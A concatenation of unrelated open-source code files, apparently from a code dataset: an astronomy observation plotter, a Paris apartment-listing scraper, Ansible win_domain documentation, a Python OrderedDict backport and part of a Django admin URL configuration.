x=ObjectTableLabels.TRANSIT, y=ObjectTableLabels.ALTITUDE, marker='o', # markersize = messier['Width'], linestyle='none', xlim=[self.start - timedelta(minutes=15), self.time_limit + timedelta(minutes=15)], ylim=(0, 90), **args) last_position = [0, 0] offset_index = 0 offsets = [(-25, -12), (5, 5), (-25, 5), (5, -12)] for obj in messier.values: distance = (((mdates.date2num( obj[1]) - last_position[0]) * 100) ** 2 + (obj[2] - last_position[1]) ** 2) ** 0.5 offset_index = offset_index + (1 if distance < 5 else 0) plot.annotate(obj[0], (mdates.date2num(obj[1]), obj[2]), xytext=offsets[offset_index % len(offsets)], textcoords='offset points') last_position = [mdates.date2num(obj[1]), obj[2]] self._mark_observation(plot) self._mark_good_conditions( plot, self.conditions.min_object_altitude, 90) Utils.annotate_plot(plot, 'Altitude [°]') return plot.get_figure() def _normalize_dates(self, start, stop): now = datetime.utcnow().astimezone(self.place.local_timezone) new_start = start if start < stop else now new_stop = stop return (new_start, new_stop) def plot_weather(self, **args): if self.place.weather is None: self.place.get_weather() self._generate_plot_weather(**args) def plot_messier(self, **args): self._generate_plot_messier(**args) def _compute_weather_goodnse(self): # Get critical weather data data = self.place.weather.get_critical_data(self.start, self.stop) # Get only data defore time limit data = data[data.time <= self.time_limit] all_hours = len(data) # Get hours with good conditions result = data[ (data.cloudCover < self.conditions.max_clouds) & (data.precipProbability < self.conditions.max_precipitation_probability) & (data.windSpeed < self.conditions.max_wind) & (data.temperature > self.conditions.min_temperature) & (data.temperature < self.conditions.max_temperature)] good_hours = len(result) logger.debug("Good hours: {} and all hours: {}".format(good_hours, all_hours)) # Return relative % of good hours return good_hours / all_hours * 100 def is_weather_good(self): if self.place.weather is None: self.place.get_weather() return self._compute_weather_goodnse() > self.conditions.min_weather_goodness def to_html(self): with open(Observation.NOTIFICATION_TEMPLATE) as template_file: template = Template(template_file.read()) data = { "title": "APTS", "start": Utils.format_date(self.start), "stop": Utils.format_date(self.stop), "planets_count": len(self.get_visible_planets()), "messier_count": len(self.get_visible_messier()), "planets_table": self.get_visible_planets().to_html(), "messier_table": self.get_visible_messier().to_html(), "equipment_table": self.equipment.data().to_html(), "place_name": self.place.name, "lat": numpy.rad2deg(self.place.lat), "lon": numpy.rad2deg(self.place.lon) } return str(template.substitute(data)) def _mark_observation(self, plot): # Check if there is a plot if plot is None: return # Add marker for night plot.axvspan(self.start, self.stop, color='gray', alpha=0.2) # Add marker for moon moon_start, moon_stop = self._normalize_dates( self.place.moonrise_time(), self.place.moonset_time()) plot.axvspan(moon_start, moon_stop, color='yellow', alpha=0.1) # Add marker for time limit plot.axvline(self.start, color='orange', linestyle='--') plot.axvline(self.time_limit, color='orange', linestyle='--') def _mark_good_conditions(self, plot, minimal, maximal): # Check if there is a plot if plot is None: return plot.axhspan(minimal, maximal, color='green', alpha=0.1) def _generate_plot_weather(self, **args): fig, axes = pyplot.subplots(nrows=4, ncols=2, figsize=(13, 18)) # Clouds plt = self.place.weather.plot_clouds(ax=axes[0, 0]) self._mark_observation(plt) self._mark_good_conditions(plt, 0, self.conditions.max_clouds) # Cloud summary plt = self.place.weather.plot_clouds_summary(ax=axes[0, 1]) # Precipation plt = self.place.weather.plot_precipitation(ax=axes[1, 0]) self._mark_observation(plt) self._mark_good_conditions( plt, 0, self.conditions.max_precipitation_probability) # precipitation type summary plt = self.place.weather.plot_precipitation_type_summary(ax=axes[1, 1]) # Temperature plt = self.place.weather.plot_temperature(ax=axes[2, 0]) self._mark_observation(plt) self._mark_good_conditions( plt, self.conditions.min_temperature, self.conditions.max_temperature) # Wind plt = self.place.weather.plot_wind(ax=axes[2, 1]) self._mark_observation(plt) self._mark_good_conditions(plt, 0, self.conditions.max_wind) # Pressure plt = self.place.weather.plot_pressure_and_ozone(ax=axes[3, 0]) self._mark_observation(plt) # Visibility plt = self.place.weather.plot_visibility(ax=axes[3, 1]) self._mark_observation(plt) fig.tight_layout() return fig
apache-2.0
amanzotti/paris_scraping
fetch.py
1
17484
import requests from bs4 import BeautifulSoup import sys import numpy as np # then add this function lower down from memory_profiler import profile import pandas as pd from sortedcontainers import SortedDict import datetime import bs4 # TODO # http://www.meilleursagents.com/immobilier/recherche/?item_types%5B%5D=369681781&item_types%5B%5D=369681782&transaction_type=369681778&place_ids%5B%5D=32696 # http://www.seloger.com/list.htm?idtt=1&idtypebien=1&cp=75&tri=initial def parse_source(html, encoding='utf-8'): parsed = BeautifulSoup(html, from_encoding=encoding) return parsed def fetch_meilleursagents(): base = 'http://www.meilleursagents.com/immobilier/recherche/?redirect_url=&view_mode=list&sort_mode=ma_contract%7Cdesc&transaction_type=369681778&buyer_search_id=&user_email=&place_ids%5B%5D=138724240&place_title=&item_types%5B%5D=369681781&item_types%5B%5D=369681782&item_area_min=&item_area_max=&budget_min=&budget_max=' resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp.content, resp.encoding) def fetch_solger(): base = 'http://www.seloger.com/list.htm?idtt=1&idtypebien=1&cp=75&tri=initial' resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp.content, resp.encoding) def fetch_pap(): base = 'http://www.pap.fr/annonce/locations-appartement-paris-14e-g37781' try: resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 resp_comb = resp.content except: pass listing = [] string = {} string[15] = '15e-g37782' string[13] = '13e-g37780' string[14] = '14e-g37781' string[2] = '2e-g37769' string[3] = '3e-g37770' string[4] = '4e-g37771' string[5] = '5e-g37772' string[6] = '6e-g37773' string[7] = '7e-g37774' string[8] = '8e-g37775' string[9] = '9e-g37776' string[10] = '10e-g37777' string[11] = '11e-g37778' string[12] = '12e-g37779' string[16] = '16e-g37783' string[17] = '17e-g37784' string[18] = '18e-g37785' string[19] = '19e-g37786' string[20] = '20e-g37787' for i in np.arange(2, 20): print(i) base2 = 'http://www.pap.fr/annonce/locations-appartement-paris-{}'.format(string[i]) try: resp_ = requests.get(base2, timeout=200) except: break # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_pap(parsed)) # print(listing) # resp_comb += resp_.content + resp_comb for j in np.arange(1, 7): print(j) base2 = 'http://www.pap.fr/annonce/locations-appartement-paris-{}-{}'.format( string[i], j) try: resp_ = requests.get(base2, timeout=200) except: break # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break # resp_comb += resp_.content + resp_comb parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_pap(parsed)) # return resp_comb, resp.encoding return listing def fetch_fusac(): base = 'http://ads.fusac.fr/ad-category/housing/' listing = [] try: resp = requests.get(base, timeout=100) resp.raise_for_status() # <- no-op if status==200 resp_comb = resp.content parsed = parse_source(resp.content, resp.encoding) listing.append(extract_listings_fusac(parsed)) except: pass for i in np.arange(2, 6): base2 = 'http://ads.fusac.fr/ad-category/housing/housing-offers/page/{}/'.format(i) try: resp_ = requests.get(base2, timeout=100) except: continue # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break # resp_comb += resp_.content + resp_comb parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_fusac(parsed)) # return resp_comb, resp.encoding return listing # handle response 200 def fetch_search_results( query=None, minAsk=600, maxAsk=1450, bedrooms=None, bundleDuplicates=1, pets_cat=1 ): listing = [] search_params = { key: val for key, val in locals().items() if val is not None } if not search_params: raise ValueError("No valid keywords") base = 'https://paris.craigslist.fr/search/apa' try: resp_ = requests.get(base, params=search_params, timeout=100) resp_.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings(parsed)) except: return None return listing # def extract_listings(parsed): # listings = parsed.find_all("li", {"class": "result-row"}) # return listings def extract_listings_fusac(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'div', {'class': "prod-cnt prod-box shadow Just-listed"}) extracted = [] for j, listing in enumerate(listings[0:]): # hood = listing.find('span', {'class': 'result-hood'}) # # print(hood) # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # if link is not None: # descr = link.string.strip() # link_href = link.attrs['href'] price = listing.find('p', {'class': 'post-price'}) if price is not None: price = float(price.string.split()[0].replace(',', '')) # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # resp = requests.get(link, timeout=10) # resp.raise_for_status() # <- no-op if status==200 desc = listing.find('p', {'class': 'post-desc'} ) if price is not None: desc = desc.string url = listing.find('div', {'class': "post-left"}).find('div', {'class': "grido"}).find('a', href=True).get('href') resp = requests.get(url, timeout=100) resp.raise_for_status() # <- no-op if status==200 parse = parse_source(resp.content, resp.encoding) try: ars = int(parse.find('div', {'class': "single-main"}).find('li', {'class': "acf-details-item"}, id="acf-cp_zipcode").find('span', {'class': 'acf-details-val'}).string[-2:]) except: ars = None this_listing = { # 'location': location, # 'link': link_href, # add this too 'price': price, 'desc': desc, # ==== # 'description': descr, 'pieces': None, 'meters': None, 'chambre': None, 'ars': ars, 'link': None } extracted.append(SortedDict(this_listing)) return extracted def extract_listings_pap(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'div', {'class': "box search-results-item"}) extracted = [] for listing in listings[0:]: # hood = listing.find('span', {'class': 'result-hood'}) # # print(hood) # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # if link is not None: # descr = link.string.strip() # link_href = link.attrs['href'] price = listing.find('span', {'class': 'price'}) if price is not None: price = float(price.string.split()[0].replace('.', '')) ref = listing.find('div', {'class': 'float-right'}).find('a', href=True)['href'] base = 'http://www.pap.fr/' + ref try: resp = requests.get(base, timeout=100) except: break link = base resp.raise_for_status() # <- no-op if status==200 resp_comb = parse_source(resp.content, resp.encoding) descr = resp_comb.find_all('p', {'class': 'item-description'})[0] desc = ' ' for line in descr.contents: if isinstance(line, bs4.element.NavigableString): desc += ' ' + line.string.strip('<\br>').strip('\n') # return resp_comb.find_all( # 'ul', {'class': 'item-summary'}) try: ars = int(resp_comb.find( 'div', {'class': 'item-geoloc'}).find('h2').string.split('e')[0][-2:]) except: break # return resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li') # print(resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li')) temp_dict_ = {} for lines in resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li'): tag = lines.contents[0].split()[0] value = int(lines.find_all('strong')[0].string.split()[0]) temp_dict_[tag] = value try: pieces = temp_dict_[u'Pi\xe8ces'] except: pieces = None try: chambre = temp_dict_[u'Chambre'] except: chambre = None try: square_meters = temp_dict_['Surface'] except: square_meters = None # meters = resp_comb.find_all('ul', {'class': 'item-summary'} # )[0].find_all('strong').string.split()[0] # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # resp = requests.get(link, timeout=10) # resp.raise_for_status() # <- no-op if status==200 # desc = listing.find('p', {'class': 'post-desc'} # ) # if price is not None: # desc = desc.string # housing = listing.find('span', {'class': 'housing'}) # if housing is not None: # beds = housing.decode_contents().split('br')[0][-1] # rm = housing.decode_contents().split('m<sup>2</sup>')[0] # sqm = [int(s) for s in rm.split() if s.isdigit()] # if len(sqm) == 0: # sqm = None # else: # sqm = int(sqm[0]) this_listing = { # 'location': location, # 'link': link_href, # add this too # 'description': descr, # and this 'price': price, 'desc': desc, 'pieces': pieces, 'meters': square_meters, 'chambre': chambre, 'ars': ars, # 'meters': sqm, # 'beds': beds 'link': link } extracted.append(SortedDict(this_listing)) return extracted def extract_listings_solger(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'article', {'class': "listing life_annuity gold"}) extracted = [] return listings # for listing in listings[0:]: # # hood = listing.find('span', {'class': 'result-hood'}) # # # print(hood) # # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # # if link is not None: # # descr = link.string.strip() # # link_href = link.attrs['href'] # price = listing.find('span', {'class': 'price'}) # if price is not None: # price = float(price.string.split()[0].replace('.', '')) # ref = listing.find('div', {'class': 'float-right'}).find('a', href=True)['href'] # base = 'http://www.pap.fr/' + ref # resp = requests.get(base, timeout=20) # link = base # resp.raise_for_status() # <- no-op if status==200 # resp_comb = parse_source(resp.content, resp.encoding) # descr = resp_comb.find_all('p', {'class': 'item-description'})[0] # desc = ' ' # for line in descr.contents: # if isinstance(line, bs4.element.NavigableString): # desc += ' ' + line.string.strip('<\br>').strip('\n') # # return resp_comb.find_all( # # 'ul', {'class': 'item-summary'}) # try: # ars = int(resp_comb.find( # 'div', {'class': 'item-geoloc'}).find('h2').string.split('e')[0][-2:]) # except: # break # # return resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li') # # print(resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li')) # temp_dict_ = {} # for lines in resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li'): # tag = lines.contents[0].split()[0] # value = int(lines.find_all('strong')[0].string.split()[0]) # temp_dict_[tag] = value # try: # pieces = temp_dict_[u'Pi\xe8ces'] # except: # pieces = None # try: # chambre = temp_dict_[u'Chambre'] # except: # chambre = None # try: # square_meters = temp_dict_['Surface'] # except: # square_meters = None # # meters = resp_comb.find_all('ul', {'class': 'item-summary'} # # )[0].find_all('strong').string.split()[0] # # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # # resp = requests.get(link, timeout=10) # # resp.raise_for_status() # <- no-op if status==200 # # desc = listing.find('p', {'class': 'post-desc'} # # ) # # if price is not None: # # desc = desc.string # # housing = listing.find('span', {'class': 'housing'}) # # if housing is not None: # # beds = housing.decode_contents().split('br')[0][-1] # # rm = housing.decode_contents().split('m<sup>2</sup>')[0] # # sqm = [int(s) for s in rm.split() if s.isdigit()] # # if len(sqm) == 0: # # sqm = None # # else: # # sqm = int(sqm[0]) # this_listing = { # # 'location': location, # # 'link': link_href, # add this too # # 'description': descr, # and this # 'price': price, # 'desc': desc, # 'pieces': pieces, # 'meters': square_meters, # 'chambre': chambre, # 'ars': ars, # # 'meters': sqm, # # 'beds': beds # 'link': link # } # extracted.append(SortedDict(this_listing)) # return extracted # parsed.find_all( # ...: 'div', {'class': "box search-results-item"})[0].find('div',{'class':'float-right'}).find('a',href=True)['href'] def extract_listings(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all("li", {"class": "result-row"}) extracted = [] for listing in listings[2:]: hood = listing.find('span', {'class': 'result-hood'}) # print(hood) # location = {key: listing.attrs.get(key, '') for key in location_attrs} link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this if link is not None: descr = link.string.strip() link_href = link.attrs['href'] price = listing.find('span', {'class': 'result-price'}) if price is not None: if price.string is not None: price = int(price.string[1:]) housing = listing.find('span', {'class': 'housing'}) if housing is not None: beds = housing.decode_contents().split('br')[0][-1] rm = housing.decode_contents().split('m<sup>2</sup>')[0] sqm = [int(s) for s in rm.split() if s.isdigit()] if len(sqm) == 0: sqm = None else: sqm = int(sqm[0]) this_listing = { # 'location': location, 'link': link_href, # add this too 'desc': descr, # and this 'price': price, 'meters': sqm, 'chambre': beds, 'pieces': None, 'ars': None } extracted.append(SortedDict(this_listing)) return extracted if __name__ == '__main__': # df = pd.read_pickle('./ipapartment_paris.pk') df = pd.DataFrame resu = [] print('loading fusac') resu.append(fetch_fusac()) print('loading pap') resu.append(fetch_pap()) print('loading craig') resu.append(fetch_search_results()) flat = [item for lis in resu for lis1 in lis for item in lis1] df_new = pd.DataFrame(flat) print('saving..') # df_new.to_pickle('./apartment_paris_{}.pk'.format(str(datetime.datetime.now()))) # df = pd.concat([df, df_new]) df_new.to_pickle('./apartment_paris.pk') print('Done.')
mit
richardcs/ansible
lib/ansible/modules/windows/win_domain.py
15
3882
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Red Hat, Inc. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'core'} DOCUMENTATION = r''' module: win_domain short_description: Ensures the existence of a Windows domain version_added: 2.3 description: - Ensure that the domain named by C(dns_domain_name) exists and is reachable. - If the domain is not reachable, the domain is created in a new forest on the target Windows Server 2012R2+ host. - This module may require subsequent use of the M(win_reboot) action if changes are made. options: dns_domain_name: description: - The DNS name of the domain which should exist and be reachable or reside on the target Windows host. required: yes type: str domain_netbios_name: description: - The NetBIOS name for the root domain in the new forest. - For NetBIOS names to be valid for use with this parameter they must be single label names of 15 characters or less, if not it will fail. - If this parameter is not set, then the default is automatically computed from the value of the I(domain_name) parameter. type: str version_added: '2.6' safe_mode_password: description: - Safe mode password for the domain controller. required: yes type: str database_path: description: - The path to a directory on a fixed disk of the Windows host where the domain database will be created. - If not set then the default path is C(%SYSTEMROOT%\NTDS). type: path version_added: '2.5' sysvol_path: description: - The path to a directory on a fixed disk of the Windows host where the Sysvol file will be created. - If not set then the default path is C(%SYSTEMROOT%\SYSVOL). type: path version_added: '2.5' create_dns_delegation: description: - Whether to create a DNS delegation that references the new DNS server that you install along with the domain controller. - Valid for Active Directory-integrated DNS only. - The default is computed automatically based on the environment. type: bool version_added: '2.8' domain_mode: description: - Specifies the domain functional level of the first domain in the creation of a new forest. - The domain functional level cannot be lower than the forest functional level, but it can be higher. - The default is automatically computed and set. type: str choices: [ Win2003, Win2008, Win2008R2, Win2012, Win2012R2, WinThreshold ] version_added: '2.8' forest_mode: description: - Specifies the forest functional level for the new forest. - The default forest functional level in Windows Server is typically the same as the version you are running. # - Beware that the default forest functional level in Windows Server 2008 R2 when you create a new forest is C(Win2003). type: str choices: [ Win2003, Win2008, Win2008R2, Win2012, Win2012R2, WinThreshold ] version_added: '2.8' author: - Matt Davis (@nitzmahone) ''' RETURN = r''' reboot_required: description: True if changes were made that require a reboot. returned: always type: boolean sample: true ''' EXAMPLES = r''' - name: Create new domain in a new forest on the target host win_domain: dns_domain_name: ansible.vagrant safe_mode_password: password123! - name: Create new Windows domain in a new forest with specific parameters win_domain: create_dns_delegation: no database_path: C:\Windows\NTDS dns_domain_name: ansible.vagrant domain_mode: Win2012R2 domain_netbios_name: ANSIBLE forest_mode: Win2012R2 safe_mode_password: password123! sysvol_path: C:\Windows\SYSVOL register: domain_install '''
gpl-3.0
maikel-bakker/gulp-environment
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/ordered_dict.py
2354
10366
# Unmodified from http://code.activestate.com/recipes/576693/ # other than to add MIT license header (as specified on page, but not in code). # Linked from Python documentation here: # http://docs.python.org/2/library/collections.html#collections.OrderedDict # # This should be deleted once Py2.7 is available on all bots, see # http://crbug.com/241769. # # Copyright (c) 2009 Raymond Hettinger. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy. # Passes Python2.7's test suite and incorporates all the latest updates. try: from thread import get_ident as _get_ident except ImportError: from dummy_thread import get_ident as _get_ident try: from _abcoll import KeysView, ValuesView, ItemsView except ImportError: pass class OrderedDict(dict): 'Dictionary that remembers insertion order' # An inherited dict maps keys to values. # The inherited dict provides __getitem__, __len__, __contains__, and get. # The remaining methods are order-aware. # Big-O running times for all methods are the same as for regular dictionaries. # The internal self.__map dictionary maps keys to links in a doubly linked list. # The circular doubly linked list starts and ends with a sentinel element. # The sentinel element never gets deleted (this simplifies the algorithm). # Each link is stored as a list of length three: [PREV, NEXT, KEY]. def __init__(self, *args, **kwds): '''Initialize an ordered dictionary. Signature is the same as for regular dictionaries, but keyword arguments are not recommended because their insertion order is arbitrary. ''' if len(args) > 1: raise TypeError('expected at most 1 arguments, got %d' % len(args)) try: self.__root except AttributeError: self.__root = root = [] # sentinel node root[:] = [root, root, None] self.__map = {} self.__update(*args, **kwds) def __setitem__(self, key, value, dict_setitem=dict.__setitem__): 'od.__setitem__(i, y) <==> od[i]=y' # Setting a new item creates a new link which goes at the end of the linked # list, and the inherited dictionary is updated with the new key/value pair. if key not in self: root = self.__root last = root[0] last[1] = root[0] = self.__map[key] = [last, root, key] dict_setitem(self, key, value) def __delitem__(self, key, dict_delitem=dict.__delitem__): 'od.__delitem__(y) <==> del od[y]' # Deleting an existing item uses self.__map to find the link which is # then removed by updating the links in the predecessor and successor nodes. dict_delitem(self, key) link_prev, link_next, key = self.__map.pop(key) link_prev[1] = link_next link_next[0] = link_prev def __iter__(self): 'od.__iter__() <==> iter(od)' root = self.__root curr = root[1] while curr is not root: yield curr[2] curr = curr[1] def __reversed__(self): 'od.__reversed__() <==> reversed(od)' root = self.__root curr = root[0] while curr is not root: yield curr[2] curr = curr[0] def clear(self): 'od.clear() -> None. Remove all items from od.' try: for node in self.__map.itervalues(): del node[:] root = self.__root root[:] = [root, root, None] self.__map.clear() except AttributeError: pass dict.clear(self) def popitem(self, last=True): '''od.popitem() -> (k, v), return and remove a (key, value) pair. Pairs are returned in LIFO order if last is true or FIFO order if false. ''' if not self: raise KeyError('dictionary is empty') root = self.__root if last: link = root[0] link_prev = link[0] link_prev[1] = root root[0] = link_prev else: link = root[1] link_next = link[1] root[1] = link_next link_next[0] = root key = link[2] del self.__map[key] value = dict.pop(self, key) return key, value # -- the following methods do not depend on the internal structure -- def keys(self): 'od.keys() -> list of keys in od' return list(self) def values(self): 'od.values() -> list of values in od' return [self[key] for key in self] def items(self): 'od.items() -> list of (key, value) pairs in od' return [(key, self[key]) for key in self] def iterkeys(self): 'od.iterkeys() -> an iterator over the keys in od' return iter(self) def itervalues(self): 'od.itervalues -> an iterator over the values in od' for k in self: yield self[k] def iteritems(self): 'od.iteritems -> an iterator over the (key, value) items in od' for k in self: yield (k, self[k]) # Suppress 'OrderedDict.update: Method has no argument': # pylint: disable=E0211 def update(*args, **kwds): '''od.update(E, **F) -> None. Update od from dict/iterable E and F. If E is a dict instance, does: for k in E: od[k] = E[k] If E has a .keys() method, does: for k in E.keys(): od[k] = E[k] Or if E is an iterable of items, does: for k, v in E: od[k] = v In either case, this is followed by: for k, v in F.items(): od[k] = v ''' if len(args) > 2: raise TypeError('update() takes at most 2 positional ' 'arguments (%d given)' % (len(args),)) elif not args: raise TypeError('update() takes at least 1 argument (0 given)') self = args[0] # Make progressively weaker assumptions about "other" other = () if len(args) == 2: other = args[1] if isinstance(other, dict): for key in other: self[key] = other[key] elif hasattr(other, 'keys'): for key in other.keys(): self[key] = other[key] else: for key, value in other: self[key] = value for key, value in kwds.items(): self[key] = value __update = update # let subclasses override update without breaking __init__ __marker = object() def pop(self, key, default=__marker): '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value. If key is not found, d is returned if given, otherwise KeyError is raised. ''' if key in self: result = self[key] del self[key] return result if default is self.__marker: raise KeyError(key) return default def setdefault(self, key, default=None): 'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od' if key in self: return self[key] self[key] = default return default def __repr__(self, _repr_running={}): 'od.__repr__() <==> repr(od)' call_key = id(self), _get_ident() if call_key in _repr_running: return '...' _repr_running[call_key] = 1 try: if not self: return '%s()' % (self.__class__.__name__,) return '%s(%r)' % (self.__class__.__name__, self.items()) finally: del _repr_running[call_key] def __reduce__(self): 'Return state information for pickling' items = [[k, self[k]] for k in self] inst_dict = vars(self).copy() for k in vars(OrderedDict()): inst_dict.pop(k, None) if inst_dict: return (self.__class__, (items,), inst_dict) return self.__class__, (items,) def copy(self): 'od.copy() -> a shallow copy of od' return self.__class__(self) @classmethod def fromkeys(cls, iterable, value=None): '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S and values equal to v (which defaults to None). ''' d = cls() for key in iterable: d[key] = value return d def __eq__(self, other): '''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive while comparison to a regular mapping is order-insensitive. ''' if isinstance(other, OrderedDict): return len(self)==len(other) and self.items() == other.items() return dict.__eq__(self, other) def __ne__(self, other): return not self == other # -- the following methods are only used in Python 2.7 -- def viewkeys(self): "od.viewkeys() -> a set-like object providing a view on od's keys" return KeysView(self) def viewvalues(self): "od.viewvalues() -> an object providing a view on od's values" return ValuesView(self) def viewitems(self): "od.viewitems() -> a set-like object providing a view on od's items" return ItemsView(self)
mit
zofuthan/airmozilla
airmozilla/manage/urls.py
5
13794
from django.conf.urls import patterns, url from .views import ( picturegallery, dashboard, events, approvals, suggestions, vidly_media, comments, loggedsearches, users, groups, channels, locations, regions, templates, topics, tags, recruitmentmessages, surveys, staticpages, url_transforms, cronlogger, permissions, autocompeter, uploads, taskstester, errors, chapters, related, ) urlpatterns = patterns( '', url(r'^/?$', dashboard.dashboard, name='dashboard'), url(r'^data/$', dashboard.dashboard_data, name='dashboard_data'), url(r'^graphs/$', dashboard.dashboard_graphs, name='dashboard_graphs'), url(r'^graphs/data/$', dashboard.dashboard_data_graphs, name='dashboard_data_graphs'), url(r'^users/(?P<id>\d+)/$', users.user_edit, name='user_edit'), url(r'^users/$', users.users, name='users'), url(r'^users/data/$', users.users_data, name='users_data'), url(r'^groups/(?P<id>\d+)/$', groups.group_edit, name='group_edit'), url(r'^groups/remove/(?P<id>\d+)/$', groups.group_remove, name='group_remove'), url(r'^groups/new/$', groups.group_new, name='group_new'), url(r'^groups/$', groups.groups, name='groups'), url(r'^events/request/$', events.event_request, name='event_request'), url(r'^events/(?P<id>\d+)/$', events.event_edit, name='event_edit'), url(r'^events/(?P<id>\d+)/privacy-vidly-mismatch/$', events.event_privacy_vidly_mismatch, name='event_privacy_vidly_mismatch'), url(r'^events/(?P<id>\d+)/assignment/$', events.event_assignment, name='event_assignment'), url(r'^events/(?P<id>\d+)/transcript/$', events.event_transcript, name='event_transcript'), url(r'^events/(?P<id>\d+)/upload/$', events.event_upload, name='event_upload'), url(r'^events/(?P<id>\d+)/vidly-submissions/$', events.event_vidly_submissions, name='event_vidly_submissions'), url(r'^events/(?P<id>\d+)/vidly-submissions/submission' r'/(?P<submission_id>\d+)/$', events.event_vidly_submission, name='event_vidly_submission'), url(r'^events/(?P<id>\d+)/comments/$', events.event_comments, name='event_comments'), url(r'^events/(?P<id>\d+)/comments/configuration/$', events.event_discussion, name='event_discussion'), url(r'^events/(?P<id>\d+)/stop-live/$', events.event_stop_live, name='stop_live_event'), url(r'^events/(?P<id>\d+)/delete/$', events.event_delete, name='event_delete'), url(r'^events/(?P<id>\d+)/survey/$', events.event_survey, name='event_survey'), url(r'^events/(?P<id>\d+)/tweets/$', events.event_tweets, name='event_tweets'), url(r'^events/(?P<id>\d+)/tweets/(?P<tweet_id>\d+)/$', events.edit_event_tweet, name='edit_event_tweet'), url(r'^events/(?P<id>\d+)/tweets/new/$', events.new_event_tweet, name='new_event_tweet'), url(r'^events/all/tweets/$', events.all_event_tweets, name='all_event_tweets'), url(r'^events/archive/(?P<id>\d+)/$', events.event_archive, name='event_archive'), url(r'^events/archive/(?P<id>\d+)/auto/$', events.event_archive_auto, name='event_archive_auto'), url(r'^events/(?P<id>\d+)/archive-time/$', events.event_archive_time, name='event_archive_time'), url(r'^events/fetch/duration/(?P<id>\d+)/$', events.event_fetch_duration, name='event_fetch_duration'), url(r'^events/fetch/screencaptures/(?P<id>\d+)/$', events.event_fetch_screencaptures, name='event_fetch_screencaptures'), url(r'^events/duplicate/(?P<duplicate_id>\d+)/$', events.event_request, name='event_duplicate'), url(r'^events/vidlyurltoshortcode/(?P<id>\d+)/', events.vidly_url_to_shortcode, name='vidly_url_to_shortcode'), url(r'^events/hits/$', events.event_hit_stats, name='event_hit_stats'), url(r'^events/assignments/$', events.event_assignments, name='event_assignments'), url(r'^events/assignments.ics$', events.event_assignments_ical, name='event_assignments_ical'), url(r'^events/$', events.events, name='events'), url(r'^events/data/$', events.events_data, name='events_data'), url(r'^events/redirect_thumbnail/(?P<id>\d+)/$', events.redirect_event_thumbnail, name='redirect_event_thumbnail'), url(r'^surveys/$', surveys.surveys_, name='surveys'), url(r'^surveys/new/$', surveys.survey_new, name='survey_new'), url(r'^surveys/(?P<id>\d+)/$', surveys.survey_edit, name='survey_edit'), url(r'^surveys/(?P<id>\d+)/delete/$', surveys.survey_delete, name='survey_delete'), url(r'^surveys/(?P<id>\d+)/questions/$', surveys.survey_questions, name='survey_questions'), url(r'^surveys/(?P<id>\d+)/question/(?P<question_id>\d+)/$', surveys.survey_question_edit, name='survey_question_edit'), url(r'^surveys/(?P<id>\d+)/question/(?P<question_id>\d+)/delete/$', surveys.survey_question_delete, name='survey_question_delete'), url(r'^surveys/(?P<id>\d+)/question/new/$', surveys.survey_question_new, name='survey_question_new'), url(r'^comments/$', comments.all_comments, name='all_comments'), url(r'^comments/(?P<id>\d+)/$', 